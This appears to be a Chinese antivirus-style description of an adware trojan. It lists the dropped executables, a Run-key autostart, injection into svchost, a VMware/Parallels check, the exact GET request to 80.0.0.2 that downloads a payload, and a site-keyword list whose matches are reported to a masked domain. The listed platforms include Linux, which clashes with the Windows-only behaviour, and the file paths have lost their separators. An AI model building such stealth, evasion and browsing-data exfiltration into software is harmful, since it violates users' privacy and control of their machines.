本病毒所有命名：

影响系统：
Win9x,WinMe,Linux

简介：
1. 病毒的主要作用为在C:DOCUME~1ADMIN~1.PADLOCALS~1Temp目录下依次释放loader.exe、scan.exe、4BNB5.exe，并运行 2. 4BNB5.exe的主要行为如下：

行为分析：
这是一个广告木马。它会弹出广告网站的窗口，并将用户的上网记录告诉病毒作者，以便病毒作者能不断改进病毒。

描述：
1. 病毒的主要作用为在C:DOCUME~1ADMIN~1.PADLOCALS~1Temp目录下依次释放loader.exe、scan.exe、4BNB5.exe，并运行

2. 4BNB5.exe的主要行为如下：

1) 改变自身的后缀为bak；若后缀已经为bak，则再添加后缀为bak；若4BNB5.BAK.bak，则文件名不变

2) 将自身复制到C:Documents and SettingsAll Users.WINDOWSApplication Data目录下，名字随机，并运行，该文件主要作用是修改IE自启动项，使IE加载时运行自身，主要是为了弹出广告

3) 检查是否在parallels、vmware虚拟机下运行，若是则不执行第二条操作

3. loader.exe的主要行为如下：

1) 在注册表HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun项中添加自身的路径，即设置为自启动

2) 向80.0.0.2发送以下请求，将接收到的文件保存到TEMP目录下的BNA.tmp文件，并创建systemsvchost.exe的进程，将文件写入到该进程中执行

"GET /40E8001430303030303030303030303030303030303031306C0000004766000000007600000642EB000530EEA2A398 HTTP/1.0",CR,LF,CR,LF,"m"

4. scan.exe程序检查访问过的网址是否有以下字符串：

gofuckyourself.com

crutop.nu

webmasterworld.com

dialerschutz.de

spywareinfo.

adultwebmasterinfo.com

boards.cexx.org

statsbank.com

tibsystems.

google.ru

vkontakte.ru

odnoklassniki.ru

将以上信息以及本机信息发送到www.w****xer.com网址